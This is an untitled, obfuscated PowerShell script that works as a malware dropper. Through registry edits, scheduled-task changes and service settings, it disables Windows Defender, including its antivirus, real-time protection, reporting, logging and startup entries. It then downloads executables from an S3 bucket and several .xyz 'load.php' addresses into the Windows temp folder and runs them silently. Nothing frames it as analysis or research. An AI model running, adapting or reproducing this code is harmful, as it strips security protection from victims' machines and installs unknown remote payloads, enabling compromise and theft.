Untitled

&("{2}{0}{3}{1}" -f'dd-MpP','ference','A','re')  -ExclusionExtension ("{1}{0}"-f'eg','.r')
&("{1}{0}" -f'g','re') ("{0}{1}"-f'de','lete') ((("{13}{2}{4}{0}{11}{3}{7}{9}{12}{10}{14}{5}{6}{1}{8}"-f'licies','f','ftw','M','are{0}Po','ow','s De','ic','ender','roso','t{0}W','{0}','f','HKLM{0}So','ind')) -f[ChaR]92) ('/f')
&("{1}{0}"-f'g','re') ("{0}{1}"-f 'a','dd') ((("{1}{14}{8}{13}{6}{3}{4}{2}{9}{0}{12}{5}{7}{10}{11}" -f 'oft{0}W','H','{0}Mic','ie','s','s D','re{0}Polic','e','LM{0}S','ros','fen','der','indow','oftwa','K'))  -f  [char]92) ('/v') ("{3}{1}{0}{2}{4}{5}"-f 'A','able','ntiS','Dis','p','yware') ('/t') ("{0}{1}{2}"-f 'REG_DW','OR','D') ('/d') "1" ('/f')
&("{0}{1}" -f're','g') ("{0}{1}"-f'ad','d') ((("{3}{7}{1}{5}{2}{6}{4}{0}{8}" -f 'fe','FvoPoliciesFvoMi','o','H','ows De','crosoftFv','Wind','KLMFvoSoftware','nder'))-REpLAce([chAr]70+[chAr]118+[chAr]111),[chAr]92) ('/v') ("{3}{1}{2}{0}" -f'irus','i','V','DisableAnt') ('/t') ("{0}{1}{2}" -f 'REG','_','DWORD') ('/d') "1" ('/f')
&("{1}{0}"-f'g','re') ("{0}{1}"-f'a','dd') ((("{4}{7}{1}{3}{14}{2}{8}{6}{12}{10}{11}{0}{9}{5}{13}" -f 'ndows De','S','oPolicie','o','HKLMf','gi','lo','lo','sf','fenderfloMpEn','roso','ftfloWi','Mic','ne','ftwarefl'))."reP`LAcE"(([chAr]102+[chAr]108+[chAr]111),'\')) ('/v') ("{1}{0}{2}"-f'leP','MpEnab','us') ('/t') ("{0}{2}{1}" -f 'REG_','D','DWOR') ('/d') "0" ('/f')
&("{0}{1}"-f're','g') ("{1}{0}" -f 'dd','a') ((("{4}{8}{0}{3}{1}{10}{9}{13}{16}{14}{5}{12}{11}{15}{19}{2}{6}{17}{7}{18}" -f 'ftwarew','ic','al','9fPol','HKLMw','ows Def','-T','ec','9fSo','sw9','ie','nde','e','fMicroso','Wind','rw9','ftw9f','ime Prot','tion','fRe')) -ReplACe ([ChaR]119+[ChaR]57+[ChaR]102),[ChaR]92) ('/v') ("{1}{4}{0}{2}{3}" -f'to','Disab','ri','ng','leBehaviorMoni') ('/t') ("{1}{0}{2}"-f'R','REG_DWO','D') ('/d') "1" ('/f')
&("{1}{0}" -f'g','re') ("{0}{1}"-f'ad','d') ((("{9}{5}{8}{21}{12}{0}{13}{10}{22}{2}{20}{14}{3}{16}{17}{4}{6}{11}{15}{1}{7}{18}{19}"-f 'Mic','e P','}Win','s Defe','}Rea','}So','l','r','ftware{0}P','HKLM{0','oft{','-Ti','s{0}','ros','w','m','n','der{0','ot','ection','do','olicie','0'))  -f  [cHAr]92) ('/v') ("{1}{3}{2}{0}" -f 'ction','Di','OAVProte','sableI') ('/t') ("{0}{1}{2}" -f 'REG','_D','WORD') ('/d') "1" ('/f')
&("{0}{1}"-f'r','eg') ("{1}{0}" -f'dd','a') ((("{3}{10}{13}{11}{0}{8}{1}{14}{6}{12}{15}{16}{2}{9}{4}{5}{7}"-f'GSoft','GPol','ot','H','c','t','mG','ion','wareIm','e','K','m','MicrosoftImGWin','LMI','iciesI','dows DefenderImGR','eal-Time Pr'))."R`Ep`lAcE"('ImG',[stRiNG][ChAr]92)) ('/v') ("{4}{1}{3}{5}{0}{2}"-f'ti','isabl','on','eOnAcces','D','sProtec') ('/t') ("{0}{1}" -f 'REG_D','WORD') ('/d') "1" ('/f')
&("{0}{1}"-f'r','eg') ("{0}{1}" -f 'ad','d') ((("{11}{7}{9}{6}{8}{4}{18}{10}{13}{0}{3}{16}{2}{5}{17}{12}{14}{1}{15}"-f'W','e ','dows Defende','i','eMwhPol','r','So','M','ftwar','wh','whMic','HKLM','l-','rosoftMwh','Tim','Protection','n','MwhRea','iciesM'))-replACE  'Mwh',[cHAr]92) ('/v') ("{3}{5}{6}{1}{4}{0}{2}" -f'r','t','ing','Di','o','sableRealtimeMo','ni') ('/t') ("{0}{2}{1}" -f 'REG_DW','D','OR') ('/d') "1" ('/f')
&("{0}{1}"-f 'r','eg') ("{0}{1}" -f'a','dd') ((("{6}{18}{5}{4}{3}{2}{17}{22}{14}{9}{12}{19}{1}{15}{13}{11}{7}{16}{10}{21}{8}{20}{0}" -f 'n','d','s','icie','l','are{0}Po','HKLM{0}S','R','otecti','roso','me','fender{0}','ft{0}W','e','ic','ows D','eal-Ti','{0}','oftw','in','o',' Pr','M')) -f [cHAR]92) ('/v') ("{1}{3}{5}{0}{2}{6}{4}" -f 'a','D','lt','isable','able','ScanOnRe','imeEn') ('/t') ("{1}{0}{2}"-f 'DWO','REG_','RD') ('/d') "1" ('/f')
&("{1}{0}" -f'eg','r') ("{1}{0}"-f'd','ad') ((("{13}{14}{16}{7}{4}{8}{9}{11}{5}{10}{1}{0}{12}{2}{15}{3}{6}" -f 'indo','softZleW',' Defende','e','S','Mi','Reporting','Zle','oftwareZlePol','ici','cro','esZle','ws','H','KL','rZl','M'))."re`PLaCE"(([char]90+[char]108+[char]101),[STRiNg][char]92)) ('/v') ("{4}{2}{0}{3}{5}{1}"-f 'bleEnh','tifications','a','an','Dis','cedNo') ('/t') ("{0}{1}{2}"-f 'REG_','DWO','RD') ('/d') "1" ('/f')
&("{1}{0}" -f 'eg','r') ("{1}{0}"-f 'd','ad') ((("{16}{8}{4}{1}{13}{7}{6}{12}{5}{15}{10}{9}{0}{2}{3}{11}{14}" -f 'ws D','Po','efende','r','tware4iX','iX','s','iXMicro','M4iXSof','do','n','4iXSp','oft4','licies4','yNet','Wi','HKL'))."R`E`pLACE"(([cHAr]52+[cHAr]105+[cHAr]88),'\')) ('/v') ("{2}{1}{0}{6}{5}{3}{4}" -f 'leBlockA','sab','Di','S','een','st','tFir') ('/t') ("{0}{1}{2}"-f'RE','G_','DWORD') ('/d') "1" ('/f')
&("{1}{0}" -f'g','re') ("{0}{1}"-f'ad','d') ((("{4}{0}{6}{3}{10}{9}{8}{1}{2}{13}{12}{7}{5}{11}"-f'KLMPic','Micros','oftPicW','li','H','der','SoftwarePicPo','n','sPic','e','ci','PicSpyNet','ows Defe','ind'))  -REplAcE'Pic',[CHar]92) ('/v') ("{3}{1}{0}{2}" -f 'Reportin','ynet','g','Sp') ('/t') ("{0}{2}{1}" -f 'RE','DWORD','G_') ('/d') "0" ('/f')
&("{0}{1}" -f'r','eg') ("{1}{0}"-f 'd','ad') ((("{0}{6}{10}{16}{1}{8}{17}{20}{15}{2}{4}{19}{5}{3}{12}{11}{14}{7}{9}{13}{18}"-f'HKLMb3','i','osof','s','tb3VW','dow','VSof','rb','e','3VS','twareb3VP','f',' De','p','ende','icr','olic','sb3V','yNet','in','M'))."rE`P`LACe"('b3V',[strInG][chAr]92)) ('/v') ("{3}{2}{0}{1}{4}" -f 'mpl','esCo','bmitSa','Su','nsent') ('/t') ("{1}{2}{0}"-f 'RD','RE','G_DWO') ('/d') "0" ('/f')
&("{0}{1}" -f're','g') ("{0}{1}"-f 'a','dd') ((("{14}{2}{7}{5}{8}{16}{11}{4}{22}{13}{12}{15}{0}{1}{20}{21}{23}{18}{9}{3}{10}{6}{19}{17}"-f'OM','8WM','M8Sys','d','olSet','u','piL','temOM8C','r','en','erA','ntr','8Contr','M','HKLMO','ol','rentCo','gger','ef','o','IOM8AutologgerO','M8','O','D'))."RepLa`Ce"('OM8',[strinG][ChAr]92)) ('/v') ("{1}{0}" -f 'rt','Sta') ('/t') ("{1}{3}{0}{2}"-f'_DWOR','RE','D','G') ('/d') "0" ('/f')
&("{1}{0}"-f 'g','re') ("{1}{0}"-f'd','ad') ((("{2}{1}{13}{5}{10}{6}{4}{0}{11}{9}{3}{7}{12}{8}" -f 'trolSet','L','HK','trol{0}WMI{0}','n','Sy','0}CurrentCo','Autolog','}DefenderAuditLogger','}Con','stem{','{0','ger{0','M{0}')) -f  [chaR]92) ('/v') ("{0}{1}" -f 'Sta','rt') ('/t') ("{2}{0}{1}" -f 'EG_D','WORD','R') ('/d') "0" ('/f')
&("{0}{2}{1}" -f 's','htasks','c') ("{0}{1}"-f '/Ch','ange') ("{1}{0}"-f'N','/T') ((("{3}{6}{5}{9}{1}{8}{2}{7}{0}{10}{4}"-f 'tGuard ','t209Windows2','u','Mi','sh','ro','c','ard209Exploi','09ExploitG','sof','MDM policy Refre'))-replAce '209',[chaR]92) ("{0}{2}{1}"-f '/Di','e','sabl')
&("{2}{1}{0}" -f's','ask','scht') ("{1}{0}"-f'e','/Chang') ("{0}{1}"-f'/','TN') ((("{4}{18}{1}{14}{10}{3}{17}{0}{22}{9}{19}{21}{12}{6}{2}{20}{15}{8}{5}{13}{11}{16}{7}" -f 'ws De','t{0}Win',' D','Win','Mi','ache ','ws','e',' C','der{0','0}','an','o','Mainten','dows{','er','c','do','crosof','}W','efend','ind','fen'))-f[CHar]92) ("{2}{0}{1}"-f 'Dis','able','/')
&("{2}{0}{1}"-f'hta','sks','sc') ("{2}{0}{1}" -f 'g','e','/Chan') ("{0}{1}"-f '/','TN') ((("{2}{1}{9}{8}{5}{16}{4}{10}{11}{12}{6}{15}{3}{14}{13}{17}{7}{0}" -f'up','c','Mi','rSyrWind','rWi','of','sSyrWindow','ean','s','ro','nd','o','w','efender ','ows D','s Defende','tSy','Cl')) -crEpLACE  ([CHAR]83+[CHAR]121+[CHAR]114),[CHAR]92) ("{1}{0}{2}" -f'Disab','/','le')
&("{2}{0}{1}" -f'c','htasks','s') ("{1}{0}"-f 'ange','/Ch') ("{1}{0}" -f'TN','/') ((("{3}{15}{5}{9}{13}{2}{11}{10}{16}{4}{0}{7}{6}{8}{14}{1}{12}"-f 'XmWindows Def','ed ','eXmWind','Mic','ere','XmWind','nder ','e','Sched','ow','en','ows Def','Scan','s','ul','rosofte','d'))."Re`Place"(([chAr]101+[chAr]88+[chAr]109),[StrinG][chAr]92)) ("{0}{2}{1}" -f '/D','le','isab')
&("{2}{0}{1}" -f 't','asks','sch') ("{0}{1}{2}" -f '/Ch','ang','e') ("{0}{1}" -f'/','TN') ((("{2}{10}{6}{0}{3}{12}{7}{11}{9}{5}{1}{4}{8}"-f'hJ8Win','d','Mic','do','er Verificati',' Defen','ws','Defend','on','8Windows','rosofthJ8Windo','erhJ','ws '))  -rePlAce  ([cHaR]104+[cHaR]74+[cHaR]56),[cHaR]92) ("{1}{2}{0}" -f 'able','/Di','s')
&("{1}{0}"-f'g','re') ("{1}{0}" -f'te','dele') ((("{9}{8}{14}{7}{3}{1}{13}{10}{12}{5}{11}{15}{6}{2}{0}{4}" -f 'proved{','crosof','p','Mi','0}Run','ore','A','are{0}','S','HKLM{0}','}Windows{0','r{','}CurrentVersion{0}Expl','t{0','oftw','0}Startup'))-f[cHAR]92) ('/v') ("{1}{3}{0}{2}" -f' D','Win','efender','dows') ('/f')
&("{1}{0}"-f'g','re') ("{0}{2}{1}" -f'de','te','le') ((("{16}{8}{2}{4}{1}{6}{11}{9}{14}{12}{10}{0}{13}{3}{5}{15}{7}"-f 'ntV','eKiMicr','w','r','are','si','osofte','iRun','KiSoft','indo','urre','KiW','KiC','e','wse','oneK','HKCUe'))  -replAcE ([CHAR]101+[CHAR]75+[CHAR]105),[CHAR]92) ('/v') ("{0}{3}{4}{1}{2}" -f 'Wi','Defend','er','ndo','ws ') ('/f')
&("{0}{1}"-f 'r','eg') ("{1}{0}"-f 'te','dele') ((("{7}{3}{0}{8}{2}{11}{1}{5}{6}{12}{10}{4}{9}" -f'cros','s','ftiyZWi','oftwareiyZMi','i','iyZC','urre','HKLMiyZS','o','oniyZRun','Vers','ndow','nt')) -crePlACE'iyZ',[ChAr]92) ('/v') ("{1}{3}{2}{4}{0}" -f 'der','Window','ef','sD','en') ('/f')
&("{1}{0}"-f'g','re') ("{1}{0}" -f'lete','de') ((("{8}{7}{0}{6}{1}{4}{5}{9}{2}{3}" -f'x7','C','rs7','hgEPP','ontext','MenuHa','hg','le','HKCR7hg*7hgshel','ndle'))."rEp`L`ACe"(([chAR]55+[chAR]104+[chAR]103),[sTRInG][chAR]92)) ('/f')
&("{0}{1}"-f 'r','eg') ("{2}{0}{1}"-f'le','te','de') ((("{6}{1}{5}{13}{9}{3}{11}{12}{14}{0}{4}{8}{7}{10}{2}" -f 'xtMe','HZDi','HZEPP','ZshellexJH','n','recto','HKCRJ','Ha','u','JH','ndlersJ','Z','C','ry','onte')) -ReplAcE  'JHZ',[cHar]92) ('/f')
&("{1}{0}"-f 'g','re') ("{2}{0}{1}"-f 'e','lete','d') ((("{0}{4}{3}{6}{5}{8}{7}{2}{1}" -f'HKC','{0}EPP','extMenuHandlers','shel','R{0}Drive{0}','0','lex{','t','}Con'))  -F [chAR]92) ('/f')
&("{1}{0}"-f 'eg','r') ("{1}{0}" -f'd','ad') ((("{9}{1}{3}{6}{4}{5}{10}{0}{11}{8}{7}{2}" -f 'etcPx','cPxSystem','oot','cP','rentCont','ro','xCur','PxWdB','c','HKLM','lS','Services'))  -crEpLAce ([CHar]99+[CHar]80+[CHar]120),[CHar]92) ('/v') ("{0}{1}"-f 'Star','t') ('/t') ("{0}{1}" -f 'REG_','DWORD') ('/d') "4" ('/f')
&("{0}{1}" -f 'r','eg') ("{1}{0}" -f 'dd','a') ((("{1}{13}{4}{6}{3}{12}{8}{9}{7}{0}{5}{2}{11}{10}" -f'S','H','rvices78EWdF','C','LM78ESys','e','tem78E','lSet78E','entCon','tro','ter','il','urr','K'))."replA`Ce"(([char]55+[char]56+[char]69),[sTriNG][char]92)) ('/v') ("{1}{0}" -f 'rt','Sta') ('/t') ("{0}{1}{2}" -f 'R','EG_DW','ORD') ('/d') "4" ('/f')
&("{1}{0}"-f'eg','r') ("{1}{0}"-f 'dd','a') ((("{2}{12}{3}{7}{6}{8}{9}{5}{1}{4}{15}{0}{14}{13}{11}{10}"-f'S','t','HKLMQ','stemQ0i','rolSetQ0','on','rr','Cu','en','tC','sQ0iWdNisDrv','ice','0iSy','rv','e','i'))  -rEplAce'Q0i',[chAr]92) ('/v') ("{1}{0}" -f'tart','S') ('/t') ("{1}{0}{2}" -f'EG_DWO','R','RD') ('/d') "4" ('/f')
&("{1}{0}"-f'g','re') ("{0}{1}"-f 'a','dd') ((("{8}{6}{10}{7}{0}{9}{3}{4}{2}{11}{1}{5}" -f 'Curre','icesi3','Ser','o','ntrolSeti3d','dWdNisSvc','LMi','3d','HK','ntC','3dSystemi','v'))."repla`ce"('i3d',[STrIng][cHAr]92)) ('/v') ("{0}{1}"-f 'S','tart') ('/t') ("{1}{0}{2}"-f'G_D','RE','WORD') ('/d') "4" ('/f')
&("{0}{1}"-f 'r','eg') ("{1}{0}"-f 'd','ad') ((("{7}{14}{3}{4}{12}{2}{8}{13}{10}{1}{11}{6}{9}{0}{5}"-f 'ices{0}','l','t','Sys','tem{','WinDefend','er','HKLM{','Co','v','ro','Set{0}S','0}Curren','nt','0}'))-f  [ChaR]92) ('/v') ("{1}{0}" -f 'art','St') ('/t') ("{0}{2}{1}"-f 'REG','ORD','_DW') ('/d') "4" ('/f')

(&("{1}{0}{2}" -f 'ew-O','N','bject') ("{2}{3}{0}{1}" -f 'lien','t','Net.W','ebC')).("{1}{2}{0}"-f 'ile','Download','F').Invoke(("{9}{6}{13}{0}{14}{4}{8}{12}{11}{7}{5}{3}{1}{10}{2}"-f 's3.','eme','e','agre','z','-','s:/','ser','o','http','nt/amazon.ex','u','naws.com/','/','ama'),("{0}{1}{2}{3}{5}{4}" -f'C:','/Windows','/temp/vl','c_upd','te.exe','a'))
&("{2}{3}{0}{1}" -f'ces','s','start-p','ro') -FilePath ((("{7}{0}{4}{9}{6}{2}{5}{10}{3}{8}{1}" -f'{','e','v','ate','0}','lc_up','ows{0}temp{0}','C:','.ex','Wind','d')) -f[Char]92) -ArgumentList ("{3}{0}{4}{2}{1}"-f'IL','=8','T /MON_ID','/VERYS','EN')

(&("{0}{1}{2}"-f 'New-','O','bject') ("{2}{0}{1}{3}"-f 'y','stem.Net.W','S','ebClient')).("{0}{2}{1}{3}"-f'D','wnl','o','oadFile').Invoke(("{3}{4}{2}{0}{7}{5}{6}{1}"-f 'nko','p','//ze','htt','p:','/load.p','h','.xyz'), ((("{6}{8}{3}{7}{5}{0}{1}{4}{2}" -f'sBs5tem','pBs5min','xe','w','i.e','ndow','c','i',':Bs5'))."REPL`Ace"(([chaR]66+[chaR]115+[chaR]53),[StRiNg][chaR]92)));&("{1}{2}{0}" -f'ss','St','art-Proce') ((("{0}{1}{4}{5}{3}{6}{2}"-f'c:pzH','window','exe','i','spzHt','emppzHm','ni.'))."re`pL`ACE"('pzH',[sTrInG][chAR]92))
(&("{2}{1}{0}"-f'ject','Ob','New-') ("{0}{1}{4}{5}{3}{2}" -f 'S','yst','ebClient','t.W','e','m.Ne')).("{1}{0}{2}" -f'oadFi','Downl','le').Invoke(("{3}{5}{0}{6}{2}{1}{4}{7}" -f'p:/','r.x','mer','ht','yz/l','t','/loa','oad.php'), ((("{6}{4}{7}{1}{2}{5}{0}{3}" -f 'mono.e','ow','sK8','xe','K','ftempK8f','c:','8fwind')).("{0}{2}{1}" -f'Rep','CE','lA').Invoke('K8f','\')));&("{4}{0}{1}{3}{2}" -f'ar','t','rocess','-P','St') ((("{3}{0}{4}{2}{1}" -f '}','ows{0}temp{0}mono.exe','d','c:{0','win')) -F [chaR]92)
(&("{2}{1}{0}{3}"-f 'j','Ob','New-','ect') ("{2}{3}{0}{1}" -f'.','Net.WebClient','Syste','m')).("{1}{3}{0}{2}"-f'nl','Do','oadFile','w').Invoke(("{7}{3}{2}{5}{4}{0}{1}{8}{6}"-f'o','a','/c','p:/','ikox.xyz/l','on','p','htt','d.ph'), ((("{3}{2}{1}{4}{5}{0}" -f'exe','e','7Wlwindows7Wlt','c:','mp','7Wlmana.'))  -CreplaCE ([CHAr]55+[CHAr]87+[CHAr]108),[CHAr]92));&("{1}{3}{2}{0}" -f 'rt-Process','S','a','t') ((("{4}{1}{3}{5}{2}{0}" -f 'mana.exe','0}w','}','i','c:{','ndows{0}temp{0'))-F [cHar]92)